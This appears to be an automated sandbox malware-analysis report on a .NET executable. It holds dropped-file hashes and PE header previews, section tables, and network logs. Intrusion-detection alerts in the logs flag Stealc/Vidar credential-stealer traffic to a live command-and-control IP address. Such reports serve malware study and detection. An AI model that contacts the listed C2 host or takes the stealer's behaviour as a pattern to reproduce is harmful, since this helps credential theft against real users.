                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                        MD5:A37EE36B536409056A86F50E67777DD7
                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):42
                        Entropy (8bit):4.0050635535766075
                        Encrypted:false
                        SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                        MD5:84CFDB4B995B1DBF543B26B86C863ADC
                        SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                        SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                        SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                        Malicious:true
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):685392
                        Entropy (8bit):6.872871740790978
                        Encrypted:false
                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                        MD5:550686C0EE48C386DFCB40199BD076AC
                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):608080
                        Entropy (8bit):6.833616094889818
                        Encrypted:false
                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):450024
                        Entropy (8bit):6.673992339875127
                        Encrypted:false
                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):2046288
                        Entropy (8bit):6.787733948558952
                        Encrypted:false
                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):257872
                        Entropy (8bit):6.727482641240852
                        Encrypted:false
                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                        MD5:4E52D739C324DB8225BD9AB2695F262F
                        SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                        SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                        SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):80880
                        Entropy (8bit):6.920480786566406
                        Encrypted:false
                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                        MD5:A37EE36B536409056A86F50E67777DD7
                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32768
                        Entropy (8bit):0.017262956703125623
                        Encrypted:false
                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                        Malicious:false
                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32768
                        Entropy (8bit):0.017262956703125623
                        Encrypted:false
                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                        Malicious:false
                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):272896
                        Entropy (8bit):6.785813762497204
                        Encrypted:false
                        SSDEEP:6144:XYaqOCMQK9syh0bxdWPhT917U4ji8U7kV:oaqOCMRyx2/fjn
                        MD5:A16BFDD7C9F753A43F3EAA5522BA9D9D
                        SHA1:36381482314AB4845531E4875C1FE520B50D1FE4
                        SHA-256:E0B2AA87DAFB8977C806C5BFADA424E7DAE2E41995B8974D72EE455513262EA5
                        SHA-512:FC700EF5A63F3CA9141991F9AEA64F1B5958C6895C27B1763791736219C0CDD8D033B9D4D7F9A4D435AB86A14C5EC4A12F69298BD7A9EE6FADE9EE98EFB1B846
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 79%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.)...GQ..GQ..GQL.DP..GQL.BP..GQL.CP..GQL.FP..GQ z<Q..GQ..FQe.GQ.=BP..GQ.=CP..GQ.=DP..GQ..GQ..GQj=GP..GQj=EP..GQRich..GQ........................PE..L.....bf...........!...&.N..........~........`...............................`............@.............................T...T...<............................@...... ...............................`...@............`..P............................text....M.......N.................. ..`.rdata...c...`...d...R..............@..@.data...\i.......`..................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):6.415848356186701
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        • Win32 Executable (generic) a (10002005/4) 49.96%
                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        File size:474'624 bytes
                        MD5:9c2b900d014ba5b9dfd0ca6cef201753
                        SHA1:e5705841f68d9443ba5efb553aa9f87556e403e5
                        SHA256:f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf317fab7b3e90281b5d05
                        SHA512:5f92c1cff9312b100feca38c4ad8aa82af351d9ca01c420ed44f154fe8c1e3c9027fcffcf9578748601bc29708e8df0969bd4cdc1732a819fb37006a769b13d4
                        SSDEEP:12288:4seLUscjnY6sJnCWH4UbmCJbbdKofwk/TsyVhpceSvbCq66imuXd6cWD/pWc0GMX:47U17
                        TLSH:3FA4A89D766076DFC85BD0729AA81DB8FB5078BB431F4243902716ADAE5C89BCF140F2
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bf.................j................... ....@.. ....................................@................................
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0x47c00a
                        Entrypoint Section:
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows cui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x6662E9C7 [Fri Jun 7 11:06:47 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Instruction
                        jmp dword ptr [0047C000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x307fc | 0x4f | .text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x78000 | 0x6d8 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0xc | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x7c000 | 0x8 |
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x30000 | 0x48 | .text
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        A7B&<U | 0x2000 | 0x2c594 | 0x2c600 | 02cd036eb91bd81e0b36971c82bf1b45 | False | 0.9998899647887324 | data | 7.998974089724877 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .text | 0x30000 | 0x46730 | 0x46800 | ec30b4931571fd884bfe8bc644b5b4eb | False | 0.3267848238031915 | data | 4.520642074921792 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc | 0x78000 | 0x6d8 | 0x800 | 468273f60eaf63ae5528e7b5d667ae35 | False | 0.36279296875 | data | 3.7387498824008096 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0x7a000 | 0xc | 0x200 | e81a80c38992ec6b3b4d5dcfcfc5314a | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        (nameless) | 0x7c000 | 0x10 | 0x200 | 7ca58d1a0a472541553b5df07f5e79fd | False | 0.044921875 | Applesoft BASIC program data, first line number 3 | 0.14263576814887827 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_VERSION | 0x780a0 | 0x44c | data | | | 0.4
                        RT_MANIFEST | 0x784ec | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                        DLL | Import
                        mscoree.dll | _CorExeMain
                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                        06/08/24-20:21:59.805841 | TCP | 2051828 | ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        06/08/24-20:21:59.555146 | TCP | 2044244 | ET TROJAN Win32/Stealc Requesting browsers Config from C2 | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        06/08/24-20:22:00.160152 | TCP | 2051831 | ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        06/08/24-20:21:58.692257 | TCP | 2044243 | ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        06/08/24-20:21:59.902142 | TCP | 2044246 | ET TROJAN Win32/Stealc Requesting plugins Config from C2 | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Jun 8, 2024 20:21:58.686938047 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:21:58.691910028 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:21:58.691996098 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:21:58.692256927 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:21:58.697139025 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:21:59.553096056 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:21:59.553186893 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:21:59.555145979 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:21:59.561285019 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:21:59.805840969 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:21:59.805902958 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:21:59.806415081 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:21:59.902142048 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:21:59.912898064 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.160151958 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.160202980 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.160242081 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.160276890 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.160315990 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.160330057 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.160387993 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.160387993 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.160410881 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.211610079 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.211685896 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.220216990 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.220278025 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.220308065 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.220340967 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.224417925 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.224447012 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.228542089 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.496449947 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.496597052 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.740082979 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.749938011 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995032072 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995050907 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995066881 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995081902 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995100021 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995114088 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995323896 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.995325089 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.995374918 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995392084 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995408058 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995444059 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.995460987 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995470047 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.995480061 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995490074 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995628119 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995642900 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:00.995645046 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:00.995704889 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.118257046 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.118359089 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.118387938 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.118426085 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.118443012 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.118459940 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.118495941 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.118521929 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.118522882 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.118549109 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.118561029 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.118602037 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.118602991 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.118638992 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
